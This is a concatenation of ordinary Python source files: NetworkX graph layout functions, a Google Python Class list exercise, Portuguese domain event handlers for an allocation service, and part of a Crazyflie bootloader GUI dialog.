pos = dict(zip(nodes, pos))
return pos
if align == 'horizontal':
top_ys = np.repeat(height, len(top))
bottom_ys = np.repeat(0, len(bottom))
top_xs = np.linspace(0, width, len(top))
bottom_xs = np.linspace(0, width, len(bottom))
top_pos = np.column_stack([top_xs, top_ys]) - offset
bottom_pos = np.column_stack([bottom_xs, bottom_ys]) - offset
pos = np.concatenate([top_pos, bottom_pos])
pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(nodes, pos))
return pos
msg = 'align must be either vertical or horizontal.'
raise ValueError(msg)
@random_state(10)
def fruchterman_reingold_layout(G,
k=None,
pos=None,
fixed=None,
iterations=50,
threshold=1e-4,
weight='weight',
scale=1,
center=None,
dim=2,
seed=None):
"""Position nodes using Fruchterman-Reingold force-directed algorithm.
The algorithm simulates a force-directed representation of the network
treating edges as springs holding nodes close, while treating nodes
as repelling objects, sometimes called an anti-gravity force.
Simulation continues until the positions are close to an equilibrium.
There are some hard-coded values: minimal distance between
nodes (0.01) and "temperature" of 0.1 to ensure nodes don't fly away.
During the simulation, `k` helps determine the distance between nodes,
though `scale` and `center` determine the size and place after
rescaling occurs at the end of the simulation.
Fixing some nodes doesn't allow them to move in the simulation.
It also turns off the rescaling feature at the simulation's end.
In addition, setting `scale` to `None` turns off rescaling.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
k : float (default=None)
Optimal distance between nodes. If None the distance is set to
1/sqrt(n) where n is the number of nodes. Increase this value
to move nodes farther apart.
pos : dict or None optional (default=None)
Initial positions for nodes as a dictionary with node as keys
and values as a coordinate list or tuple. If None, then use
random initial positions.
fixed : list or None optional (default=None)
Nodes to keep fixed at initial position.
ValueError raised if `fixed` specified and `pos` not.
iterations : int optional (default=50)
Maximum number of iterations taken
threshold: float optional (default = 1e-4)
Threshold for relative error in node position changes.
The iteration stops if the error is below this threshold.
weight : string or None optional (default='weight')
The edge attribute that holds the numerical value used for
the edge weight. If None, then all edge weights are 1.
scale : number or None (default: 1)
Scale factor for positions. Not used unless `fixed is None`.
If scale is None, no rescaling is performed.
center : array-like or None
Coordinate pair around which to center the layout.
Not used unless `fixed is None`.
dim : int
Dimension of layout.
seed : int, RandomState instance or None optional (default=None)
Set the random state for deterministic node layouts.
If int, `seed` is the seed used by the random number generator,
if numpy.random.RandomState instance, `seed` is the random
number generator,
if None, the random number generator is the RandomState instance used
by numpy.random.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.spring_layout(G)
# The same using longer but equivalent function name
>>> pos = nx.fruchterman_reingold_layout(G)
"""
import numpy as np
G, center = _process_params(G, center, dim)
if fixed is not None:
if pos is None:
raise ValueError('nodes are fixed without positions given')
for node in fixed:
if node not in pos:
raise ValueError('nodes are fixed without positions given')
nfixed = {node: i for i, node in enumerate(G)}
fixed = np.asarray([nfixed[node] for node in fixed])
if pos is not None:
# Determine size of existing domain to adjust initial positions
dom_size = max(coord for pos_tup in pos.values() for coord in pos_tup)
if dom_size == 0:
dom_size = 1
pos_arr = seed.rand(len(G), dim) * dom_size + center
for i, n in enumerate(G):
if n in pos:
pos_arr[i] = np.asarray(pos[n])
else:
pos_arr = None
dom_size = 1
if len(G) == 0:
return {}
if len(G) == 1:
return {nx.utils.arbitrary_element(G.nodes()): center}
try:
# Sparse matrix
if len(G) < 500: # sparse solver for large graphs
raise ValueError
A = nx.to_scipy_sparse_matrix(G, weight=weight, dtype='f')
if k is None and fixed is not None:
# We must adjust k by domain size for layouts not near 1x1
nnodes, _ = A.shape
k = dom_size / np.sqrt(nnodes)
pos = _sparse_fruchterman_reingold(A, k, pos_arr, fixed,
iterations, threshold,
dim, seed)
except:
A = nx.to_numpy_array(G, weight=weight)
if k is None and fixed is not None:
# We must adjust k by domain size for layouts not near 1x1
nnodes, _ = A.shape
k = dom_size / np.sqrt(nnodes)
pos = _fruchterman_reingold(A, k, pos_arr, fixed, iterations,
threshold, dim, seed)
if fixed is None and scale is not None:
pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(G, pos))
return pos
spring_layout = fruchterman_reingold_layout
@random_state(7)
def _fruchterman_reingold(A, k=None, pos=None, fixed=None, iterations=50,
threshold=1e-4, dim=2, seed=None):
# Position nodes in adjacency matrix A using Fruchterman-Reingold
# Entry point for NetworkX graph is fruchterman_reingold_layout()
import numpy as np
try:
nnodes, _ = A.shape
except AttributeError:
msg = "fruchterman_reingold() takes an adjacency matrix as input"
raise nx.NetworkXError(msg)
if pos is None:
# random initial positions
pos = np.asarray(seed.rand(nnodes, dim), dtype=A.dtype)
else:
# make sure positions are of same type as matrix
pos = pos.astype(A.dtype)
# optimal distance between nodes
if k is None:
k = np.sqrt(1.0 / nnodes)
# the initial "temperature" is about .1 of domain area (=1x1)
# this is the largest step allowed in the dynamics.
# We need to calculate this in case our fixed positions force our domain
# to be much bigger than 1x1
t = max(max(pos.T[0]) - min(pos.T[0]), max(pos.T[1]) - min(pos.T[1])) * 0.1
# simple cooling scheme.
# linearly step down by dt on each iteration so last iteration is size dt.
dt = t / float(iterations + 1)
delta = np.zeros((pos.shape[0], pos.shape[0], pos.shape[1]), dtype=A.dtype)
# the inscrutable (but fast) version
# this is still O(V^2)
# could use multilevel methods to speed this up significantly
for iteration in range(iterations):
# matrix of difference between points
delta = pos[:, np.newaxis, :] - pos[np.newaxis, :, :]
# distance between points
distance = np.linalg.norm(delta, axis=-1)
# enforce minimum distance of 0.01
np.clip(distance, 0.01, None, out=distance)
# displacement "force"
displacement = np.einsum('ijk,ij->ik',
delta,
(k * k / distance**2 - A * distance / k))
# update positions
length = np.linalg.norm(displacement, axis=-1)
length = np.where(length < 0.01, 0.1, length)
delta_pos = np.einsum('ij,i->ij', displacement, t / length)
if fixed is not None:
# don't change positions of fixed nodes
delta_pos[fixed] = 0.0
pos += delta_pos
# cool temperature
t -= dt
err = np.linalg.norm(delta_pos) / nnodes
if err < threshold:
break
return pos
@random_state(7)
def _sparse_fruchterman_reingold(A, k=None, pos=None, fixed=None,
iterations=50, threshold=1e-4, dim=2,
seed=None):
# Position nodes in adjacency matrix A using Fruchterman-Reingold
# Entry point for NetworkX graph is fruchterman_reingold_layout()
# Sparse version
import numpy as np
try:
nnodes, _ = A.shape
except AttributeError:
msg = "fruchterman_reingold() takes an adjacency matrix as input"
raise nx.NetworkXError(msg)
try:
from scipy.sparse import spdiags, coo_matrix
except ImportError:
msg = "_sparse_fruchterman_reingold() scipy numpy: http://scipy.org/ "
raise ImportError(msg)
# make sure we have a LIst of Lists representation
try:
A = A.tolil()
except:
A = (coo_matrix(A)).tolil()
if pos is None:
# random initial positions
pos = np.asarray(seed.rand(nnodes, dim), dtype=A.dtype)
else:
# make sure positions are of same type as matrix
pos = pos.astype(A.dtype)
# no fixed nodes
if fixed is None:
fixed = []
# optimal distance between nodes
if k is None:
k = np.sqrt(1.0 / nnodes)
# the initial "temperature" is about .1 of domain area (=1x1)
# this is the largest step allowed in the dynamics.
t = max(max(pos.T[0]) - min(pos.T[0]), max(pos.T[1]) - min(pos.T[1])) * 0.1
# simple cooling scheme.
# linearly step down by dt on each iteration so last iteration is size dt.
dt = t / float(iterations + 1)
displacement = np.zeros((dim, nnodes))
for iteration in range(iterations):
displacement *= 0
# loop over rows
for i in range(A.shape[0]):
if i in fixed:
continue
# difference between this row's node position and all others
delta = (pos[i] - pos).T
# distance between points
distance = np.sqrt((delta**2).sum(axis=0))
# enforce minimum distance of 0.01
distance = np.where(distance < 0.01, 0.01, distance)
# the adjacency matrix row
Ai = np.asarray(A.getrowview(i).toarray())
# displacement "force"
displacement[:, i] +=\
(delta * (k * k / distance**2 - Ai * distance / k)).sum(axis=1)
# update positions
length = np.sqrt((displacement**2).sum(axis=0))
length = np.where(length < 0.01, 0.1, length)
delta_pos = (displacement * t / length).T
pos += delta_pos
# cool temperature
t -= dt
err = np.linalg.norm(delta_pos) / nnodes
if err < threshold:
break
return pos
def kamada_kawai_layout(G, dist=None,
pos=None,
weight='weight',
scale=1,
center=None,
dim=2):
"""Position nodes using Kamada-Kawai path-length cost-function.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
dist : float (default=None)
A two-level dictionary of optimal distances between nodes,
indexed by source and destination node.
If None, the distance is computed using shortest_path_length().
pos : dict or None optional (default=None)
Initial positions for nodes as a dictionary with node as keys
and values as a coordinate list or tuple. If None, then use
circular_layout() for dim >= 2 and a linear layout for dim == 1.
weight : string or None optional (default='weight')
The edge attribute that holds the numerical value used for
the edge weight. If None, then all edge weights are 1.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.kamada_kawai_layout(G)
"""
import numpy as np
G, center = _process_params(G, center, dim)
nNodes = len(G)
if dist is None:
dist = dict(nx.shortest_path_length(G, weight=weight))
dist_mtx = 1e6 * np.ones((nNodes, nNodes))
for row, nr in enumerate(G):
if nr not in dist:
continue
rdist = dist[nr]
for col, nc in enumerate(G):
if nc not in rdist:
continue
dist_mtx[row][col] = rdist[nc]
if pos is None:
if dim >= 2:
pos = circular_layout(G, dim=dim)
else:
pos = {n: pt for n, pt in zip(G, np.linspace(0, 1, len(G)))}
pos_arr = np.array([pos[n] for n in G])
pos = _kamada_kawai_solve(dist_mtx, pos_arr, dim)
pos = rescale_layout(pos, scale=scale) + center
return dict(zip(G, pos))
def _kamada_kawai_solve(dist_mtx, pos_arr, dim):
# Anneal node locations based on the Kamada-Kawai cost-function,
# using the supplied matrix of preferred inter-node distances,
# and starting locations.
import numpy as np
from scipy.optimize import minimize
meanwt = 1e-3
costargs = (np, 1 / (dist_mtx + np.eye(dist_mtx.shape[0]) * 1e-3),
meanwt, dim)
optresult = minimize(_kamada_kawai_costfn, pos_arr.ravel(),
method='L-BFGS-B', args=costargs, jac=True)
return optresult.x.reshape((-1, dim))
def _kamada_kawai_costfn(pos_vec, np, invdist, meanweight, dim):
# Cost-function and gradient for Kamada-Kawai layout algorithm
nNodes = invdist.shape[0]
pos_arr = pos_vec.reshape((nNodes, dim))
delta = pos_arr[:, np.newaxis, :] - pos_arr[np.newaxis, :, :]
nodesep = np.linalg.norm(delta, axis=-1)
direction = np.einsum('ijk,ij->ijk',
delta,
1 / (nodesep + np.eye(nNodes) * 1e-3))
offset = nodesep * invdist - 1.0
offset[np.diag_indices(nNodes)] = 0
cost = 0.5 * np.sum(offset ** 2)
grad = (np.einsum('ij,ij,ijk->ik', invdist, offset, direction) -
np.einsum('ij,ij,ijk->jk', invdist, offset, direction))
# Additional parabolic term to encourage mean position to be near origin:
sumpos = np.sum(pos_arr, axis=0)
cost += 0.5 * meanweight * np.sum(sumpos ** 2)
grad += meanweight * sumpos
return (cost, grad.ravel())
def spectral_layout(G, weight='weight', scale=1, center=None, dim=2):
"""Position nodes using the eigenvectors of the graph Laplacian.
Using the unnormalized Laplacion, the layout shows possible clusters of
nodes which are an approximation of the ratio cut. If dim is the number of
dimensions then the positions are the entries of the dim eigenvectors
corresponding to the ascending eigenvalues starting from the second one.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
weight : string or None optional (default='weight')
The edge attribute that holds the numerical value used for
the edge weight. If None, then all edge weights are 1.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.spectral_layout(G)
Notes
-----
Directed graphs will be considered as undirected graphs when
positioning the nodes.
For larger graphs (>500 nodes) this will use the SciPy sparse
eigenvalue solver (ARPACK).
"""
# handle some special cases that break the eigensolvers
import numpy as np
G, center = _process_params(G, center, dim)
if len(G) <= 2:
if len(G) == 0:
pos = np.array([])
elif len(G) == 1:
pos = np.array([center])
else:
pos = np.array([np.zeros(dim), np.array(center) * 2.0])
return dict(zip(G, pos))
try:
# Sparse matrix
if len(G) < 500: # dense solver is faster for small graphs
raise ValueError
A = nx.to_scipy_sparse_matrix(G, weight=weight, dtype='d')
# Symmetrize directed graphs
if G.is_directed():
A = A + np.transpose(A)
pos = _sparse_spectral(A, dim)
except (ImportError, ValueError):
# Dense matrix
A = nx.to_numpy_array(G, weight=weight)
# Symmetrize directed graphs
if G.is_directed():
A += A.T
pos = _spectral(A, dim)
pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(G, pos))
return pos
def _spectral(A, dim=2):
# Input adjacency matrix A
# Uses dense eigenvalue solver from numpy
import numpy as np
try:
nnodes, _ = A.shape
except AttributeError:
msg = "spectral() takes an adjacency matrix as input"
raise nx.NetworkXError(msg)
# form Laplacian matrix where D is diagonal of degrees
D = np.identity(nnodes, dtype=A.dtype) * np.sum(A, axis=1)
L = D - A
eigenvalues, eigenvectors = np.linalg.eig(L)
# sort and keep smallest nonzero
index = np.argsort(eigenvalues)[1:dim + 1] # 0 index is zero eigenvalue
return np.real(eigenvectors[:, index])
def _sparse_spectral(A, dim=2):
# Input adjacency matrix A
# Uses sparse eigenvalue solver from scipy
# Could use multilevel methods here, see Koren "On spectral graph drawing"
import numpy as np
from scipy.sparse import spdiags
from scipy.sparse.linalg.eigen import eigsh
try:
nnodes, _ = A.shape
except AttributeError:
msg = "sparse_spectral() takes an adjacency matrix as input"
raise nx.NetworkXError(msg)
# form Laplacian matrix
data = np.asarray(A.sum(axis=1).T)
D = spdiags(data, 0, nnodes, nnodes)
L = D - A
k = dim + 1
# number of Lanczos vectors for ARPACK solver.What is the right scaling?
ncv = max(2 * k + 1, int(np.sqrt(nnodes)))
# return smallest k eigenvalues and eigenvectors
eigenvalues, eigenvectors = eigsh(L, k, which='SM', ncv=ncv)
index = np.argsort(eigenvalues)[1:k] # 0 index is zero eigenvalue
return np.real(eigenvectors[:, index])
def planar_layout(G, scale=1, center=None, dim=2):
"""Position nodes without edge intersections.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G. If G is of type
PlanarEmbedding, the positions are selected accordingly.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G. If G is of type
nx.PlanarEmbedding, the positions are selected accordingly.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Raises
------
nx.NetworkXException
If G is not planar
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.planar_layout(G)
"""
import numpy as np
if dim != 2:
raise ValueError('can only handle 2 dimensions')
G, center = _process_params(G, center, dim)
if len(G) == 0:
return {}
if isinstance(G, nx.PlanarEmbedding):
embedding = G
else:
is_planar, embedding = nx.check_planarity(G)
if not is_planar:
raise nx.NetworkXException("G is not planar.")
pos = nx.combinatorial_embedding_to_pos(embedding)
node_list = list(embedding)
pos = np.row_stack((pos[x] for x in node_list))
pos = pos.astype(np.float64)
pos = rescale_layout(pos, scale=scale) + center
return dict(zip(node_list, pos))
def spiral_layout(G, scale=1, center=None, dim=2,
resolution=0.35, equidistant=False):
"""Position nodes in a spiral layout.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout, currently only dim=2 is supported.
Other dimension values result in a ValueError.
resolution : float
The compactness of the spiral layout returned.
Lower values result in more compressed spiral layouts.
equidistant : bool
If True, nodes will be plotted equidistant from each other.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Raises
-------
ValueError
If dim != 2
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.spiral_layout(G)
Notes
-----
This algorithm currently only works in two dimensions.
"""
import numpy as np
if dim != 2:
raise ValueError('can only handle 2 dimensions')
G, center = _process_params(G, center, dim)
if len(G) == 0:
return {}
if len(G) == 1:
return {nx.utils.arbitrary_element(G): center}
pos = []
if equidistant:
chord = 1
step = 0.5
theta = resolution
for _ in range(len(G)):
r = step * theta
theta += chord / r
pos.append([np.cos(theta) * r, np.sin(theta) * r])
else:
# set the starting angle and step
step = 1
angle = 0.0
dist = 0.0
# set the radius for the spiral to the number of nodes in the graph
radius = len(G)
while dist * np.hypot(np.cos(angle), np.sin(angle)) < radius:
pos.append([dist * np.cos(angle), dist * np.sin(angle)])
dist += step
angle += resolution
pos = rescale_layout(np.array(pos), scale=scale) + center
pos = dict(zip(G, pos))
return pos
def rescale_layout(pos, scale=1):
"""Returns scaled position array to (-scale, scale) in all axes.
The function acts on NumPy arrays which hold position information.
Each position is one row of the array. The dimension of the space
equals the number of columns. Each coordinate in one column.
To rescale, the mean (center) is subtracted from each axis separately.
Then all values are scaled so that the largest magnitude value
from all axes equals `scale` (thus, the aspect ratio is preserved).
The resulting NumPy Array is returned (order of rows unchanged).
Parameters
----------
pos : numpy array
positions to be scaled. Each row is a position.
scale : number (default: 1)
The size of the resulting extent in all directions.
Returns
-------
pos : numpy array
scaled positions. Each row is a position.
"""
# Find max length over all dimensions
lim = 0 # max coordinate for all axes
for i in range(pos.shape[1]):
pos[:, i] -= pos[:, i].mean()
lim = max(abs(pos[:, i]).max(), lim)
# rescale to (-scale, scale) in all directions, preserves aspect
if lim > 0:
for i in range(pos.shape[1]):
pos[:, i] *= scale / lim
return pos
| 31.045709
| 81
| 0.602145
|
0c72d3290927fd4508a029a422fb224801e2abb6
| 2,167
|
py
|
Python
|
basic/list2.py
|
mushfeqr/google-python3-exercises
|
1c05f823ddd8c1e09e6010560321cc42fce095d2
|
[
"Apache-2.0"
] | null | null | null |
basic/list2.py
|
mushfeqr/google-python3-exercises
|
1c05f823ddd8c1e09e6010560321cc42fce095d2
|
[
"Apache-2.0"
] | null | null | null |
basic/list2.py
|
mushfeqr/google-python3-exercises
|
1c05f823ddd8c1e09e6010560321cc42fce095d2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
# Additional basic list exercises
# D. Given a list of numbers, return a list where
# all adjacent == elements have been reduced to a single element,
# so [1, 2, 2, 3] returns [1, 2, 3]. You may create a new list or
# modify the passed in list.
def remove_adjacent(nums):
# +++your code here+++
return
# E. Given two lists sorted in increasing order, create and return a merged
# list of all the elements in sorted order. You may modify the passed in lists.
# Ideally, the solution should work in "linear" time, making a single
# pass of both lists.
def linear_merge(list1, list2):
# +++your code here+++
return
# Note: the solution above is kind of cute, but unforunately list.pop(0)
# is not constant time with the standard python list implementation, so
# the above is not strictly linear time.
# An alternate approach uses pop(-1) to remove the endmost elements
# from each list, building a solution list which is backwards.
# Then use reversed() to put the result back in the correct order. That
# solution works in linear time, but is more ugly.
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print('{} got: {} expected: {}'.format(prefix, repr(got), repr(expected)))
# Calls the above functions with interesting inputs.
def main():
print('remove_adjacent')
test(remove_adjacent([1, 2, 2, 3]), [1, 2, 3])
test(remove_adjacent([2, 2, 3, 3, 3]), [2, 3])
test(remove_adjacent([]), [])
print
print('linear_merge')
test(linear_merge(['aa', 'xx', 'zz'], ['bb', 'cc']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'xx'], ['bb', 'cc', 'zz']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'aa'], ['aa', 'bb', 'bb']),
['aa', 'aa', 'aa', 'bb', 'bb'])
if __name__ == '__main__':
main()
| 32.833333
| 79
| 0.661744
|
77f367240ea2a8296d77b53becca5edffe47db13
| 3,177
|
py
|
Python
|
src/alocacao/camada_servicos/handlers.py
|
ralphribeiro/APWP-T2
|
1ed5552a32ae9320eadbbd0489c2082a6f8750a8
|
[
"MIT"
] | null | null | null |
src/alocacao/camada_servicos/handlers.py
|
ralphribeiro/APWP-T2
|
1ed5552a32ae9320eadbbd0489c2082a6f8750a8
|
[
"MIT"
] | null | null | null |
src/alocacao/camada_servicos/handlers.py
|
ralphribeiro/APWP-T2
|
1ed5552a32ae9320eadbbd0489c2082a6f8750a8
|
[
"MIT"
] | null | null | null |
from dataclasses import asdict
from alocacao.adapters import notifications
from alocacao.aplicacao import redis_eventpublisher
from alocacao.camada_servicos import unit_of_work
from alocacao.dominio import modelo, eventos, comandos
class SkuInvalido(Exception):
...
def adiciona_lote(
comando: comandos.CriarLote,
uow: unit_of_work.AbstractUOW
):
with uow:
produto = uow.produtos.get(sku=comando.sku)
if produto is None:
produto = modelo.Produto(comando.sku, lotes=[])
uow.produtos.add(produto)
produto.lotes.append(modelo.Lote(
comando.ref, comando.sku, comando.qtd, comando.eta
))
uow.commit()
def alocar(
comando: comandos.Alocar,
uow: unit_of_work.AbstractUOW
) -> str:
linha = modelo.LinhaPedido(comando.pedido_id, comando.sku, comando.qtd)
with uow:
produto = uow.produtos.get(sku=comando.sku)
if produto is None:
raise SkuInvalido(f'Sku inválido {comando.sku}')
ref_lote = produto.alocar(linha)
uow.commit()
return ref_lote
def realocar(
evento: eventos.Desalocado,
uow: unit_of_work.SQLAlchemyUOW
):
with uow:
produto = uow.produtos.get(sku=evento.sku)
produto.eventos.append(comandos.Alocar(**asdict(evento)))
uow.commit()
def altera_qtd_lote(
comando: comandos.AlterarQuantidadeLote,
uow: unit_of_work.AbstractUOW
):
with uow:
produto = uow.produtos.get_by_ref(comando.ref)
produto.altera_qtd_lote(comando.ref, comando.qtd_nova)
uow.commit()
def envia_notificacao_sem_estoque(
evento: eventos.SemEstoque,
notifications: notifications.AbstractNotifications
):
notifications.send(
'estoque@apwp-t2.com',
f'Fora de estoque para {evento.sku}'
)
def publica_evento_alocado(
evento: eventos.Alocado
):
redis_eventpublisher.publish('linha_alocada', evento)
def adiciona_alocacao_ao_modelo_de_leitura(
evento: eventos.Alocado,
uow: unit_of_work.SQLAlchemyUOW
):
with uow:
uow.session.execute(
'INSERT INTO alocacoes_view (pedido_id, sku, ref_lote) '
'VALUES (:pedido_id, :sku, :ref_lote)',
dict(
pedido_id=evento.pedido_id,
sku=evento.sku,
ref_lote=evento.ref_lote
)
)
uow.commit()
def remove_alocacao_do_modelo_de_leitura(
evento: eventos.Desalocado,
uow: unit_of_work.SQLAlchemyUOW
):
with uow:
uow.session.execute(
'DELETE FROM alocacoes_view '
'WHERE pedido_id=:pedido_id AND sku=:sku',
dict(pedido_id=evento.pedido_id, sku=evento.sku)
)
uow.commit()
EVENT_HANDLERS = {
eventos.SemEstoque: [envia_notificacao_sem_estoque],
eventos.Alocado: [
publica_evento_alocado,
adiciona_alocacao_ao_modelo_de_leitura
],
eventos.Desalocado: [
remove_alocacao_do_modelo_de_leitura,
realocar
],
}
COMMAND_HANDLERS = {
comandos.CriarLote: adiciona_lote,
comandos.Alocar: alocar,
comandos.AlterarQuantidadeLote: altera_qtd_lote
}
| 25.416
| 75
| 0.665093
|
3fffdd15f4afb89a483e022651a57857f3527241
| 9,882
|
py
|
Python
|
crazyflie-clients-python/src/cfclient/ui/dialogs/bootloader.py
|
manikamakam/swarm
|
3d3f4692f1969e0973fa8929660a8d0da53cafa7
|
[
"MIT"
] | null | null | null |
crazyflie-clients-python/src/cfclient/ui/dialogs/bootloader.py
|
manikamakam/swarm
|
3d3f4692f1969e0973fa8929660a8d0da53cafa7
|
[
"MIT"
] | null | null | null |
crazyflie-clients-python/src/cfclient/ui/dialogs/bootloader.py
|
manikamakam/swarm
|
3d3f4692f1969e0973fa8929660a8d0da53cafa7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# || ____ _ __
# +------+ / __ )(_) /_______________ _____ ___
# | 0xBC | / __ / / __/ ___/ ___/ __ `/_ / / _ \
# +------+ / /_/ / / /_/ /__/ / / /_/ / / /_/ __/
# || || /_____/_/\__/\___/_/ \__,_/ /___/\___/
#
# Copyright (C) 2011-2013 Bitcraze AB
#
# Crazyflie Nano Quadcopter Client
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
The bootloader dialog is used to update the Crazyflie firmware and to
read/write the configuration block in the Crazyflie flash.
"""
from cflib.bootloader import Bootloader
import logging
from PyQt5 import QtWidgets, uic
from PyQt5.QtCore import pyqtSlot, pyqtSignal, QThread
import cfclient
__author__ = 'Bitcraze AB'
__all__ = ['BootloaderDialog']
logger = logging.getLogger(__name__)
service_dialog_class = uic.loadUiType(cfclient.module_path +
"/ui/dialogs/bootloader.ui")[0]
class UIState:
DISCONNECTED = 0
CONNECTING = 5
CONNECT_FAILED = 1
COLD_CONNECT = 2
FLASHING = 3
RESET = 4
class BootloaderDialog(QtWidgets.QWidget, service_dialog_class):
"""Tab for update the Crazyflie firmware and for reading/writing the config
block in flash"""
def __init__(self, helper, *args):
super(BootloaderDialog, self).__init__(*args)
self.setupUi(self)
self.tabName = "Service"
self.menuName = "Service"
# self.tabWidget = tabWidget
self.helper = helper
# self.cf = crazyflie
self.clt = CrazyloadThread()
# Connecting GUI signals (a pity to do that manually...)
self.imagePathBrowseButton.clicked.connect(self.pathBrowse)
self.programButton.clicked.connect(self.programAction)
self.verifyButton.clicked.connect(self.verifyAction)
self.coldBootButton.clicked.connect(self.initiateColdboot)
self.resetButton.clicked.connect(self.resetCopter)
self._cancel_bootloading.clicked.connect(self.close)
# connecting other signals
self.clt.programmed.connect(self.programDone)
self.clt.verified.connect(self.verifyDone)
self.clt.statusChanged.connect(self.statusUpdate)
# self.clt.updateBootloaderStatusSignal.connect(
# self.updateBootloaderStatus)
self.clt.connectingSignal.connect(
lambda: self.setUiState(UIState.CONNECTING))
self.clt.connectedSignal.connect(
lambda: self.setUiState(UIState.COLD_CONNECT))
self.clt.failed_signal.connect(lambda m: self._ui_connection_fail(m))
self.clt.disconnectedSignal.connect(
lambda: self.setUiState(UIState.DISCONNECTED))
self.clt.start()
def _ui_connection_fail(self, message):
self.setStatusLabel(message)
self.coldBootButton.setEnabled(True)
def setUiState(self, state):
if (state == UIState.DISCONNECTED):
self.resetButton.setEnabled(False)
self.programButton.setEnabled(False)
self.setStatusLabel("Not connected")
self.coldBootButton.setEnabled(True)
self.progressBar.setTextVisible(False)
self.progressBar.setValue(0)
self.statusLabel.setText('Status: <b>IDLE</b>')
self.imagePathLine.setText("")
elif (state == UIState.CONNECTING):
self.resetButton.setEnabled(False)
self.programButton.setEnabled(False)
self.setStatusLabel("Trying to connect cold bootloader, restart "
"the Crazyflie to connect")
self.coldBootButton.setEnabled(False)
elif (state == UIState.CONNECT_FAILED):
self.setStatusLabel("Connecting to bootloader failed")
self.coldBootButton.setEnabled(True)
elif (state == UIState.COLD_CONNECT):
self.resetButton.setEnabled(True)
self.programButton.setEnabled(True)
self.setStatusLabel("Connected to bootloader")
self.coldBootButton.setEnabled(False)
elif (state == UIState.RESET):
self.setStatusLabel("Resetting to firmware, disconnected")
self.resetButton.setEnabled(False)
self.programButton.setEnabled(False)
self.coldBootButton.setEnabled(False)
self.imagePathLine.setText("")
def setStatusLabel(self, text):
self.connectionStatus.setText("Status: <b>%s</b>" % text)
def connected(self):
self.setUiState(UIState.COLD_CONNECT)
def connectionFailed(self):
self.setUiState(UIState.CONNECT_FAILED)
def resetCopter(self):
self.clt.resetCopterSignal.emit()
self.setUiState(UIState.RESET)
def updateConfig(self, channel, speed, rollTrim, pitchTrim):
self.rollTrim.setValue(rollTrim)
self.pitchTrim.setValue(pitchTrim)
self.radioChannel.setValue(channel)
self.radioSpeed.setCurrentIndex(speed)
def closeEvent(self, event):
self.setUiState(UIState.RESET)
self.clt.resetCopterSignal.emit()
@pyqtSlot()
def pathBrowse(self):
filename = ""
# Fix for crash in X on Ubuntu 14.04
filename, _ = QtWidgets.QFileDialog.getOpenFileName()
if filename != "":
self.imagePathLine.setText(filename)
pass
@pyqtSlot()
def programAction(self):
# self.setStatusLabel("Initiate programming")
self.resetButton.setEnabled(False)
self.programButton.setEnabled(False)
self.imagePathBrowseButton.setEnabled(False)
if self.imagePathLine.text() != "":
self.clt.program.emit(self.imagePathLine.text(),
self.verifyCheckBox.isChecked())
else:
msgBox = QtWidgets.QMessageBox()
msgBox.setText("Please choose an image file to program.")
msgBox.exec_()
@pyqtSlot()
def verifyAction(self):
self.statusLabel.setText('Status: <b>Initiate verification</b>')
pass
@pyqtSlot(bool)
def programDone(self, success):
if success:
self.statusLabel.setText('Status: <b>Programing complete!</b>')
else:
self.statusLabel.setText('Status: <b>Programing failed!</b>')
self.resetButton.setEnabled(True)
self.programButton.setEnabled(True)
self.imagePathBrowseButton.setEnabled(True)
@pyqtSlot()
def verifyDone(self):
self.statusLabel.setText('Status: <b>Verification complete</b>')
pass
@pyqtSlot(str, int)
def statusUpdate(self, status, progress):
logger.debug("Status: [%s] | %d", status, progress)
self.statusLabel.setText('Status: <b>' + status + '</b>')
if progress >= 0:
self.progressBar.setValue(progress)
def initiateColdboot(self):
self.clt.initiateColdBootSignal.emit("radio://0/100")
# No run method specified here as the default run implementation is running the
# event loop which is what we want
class CrazyloadThread(QThread):
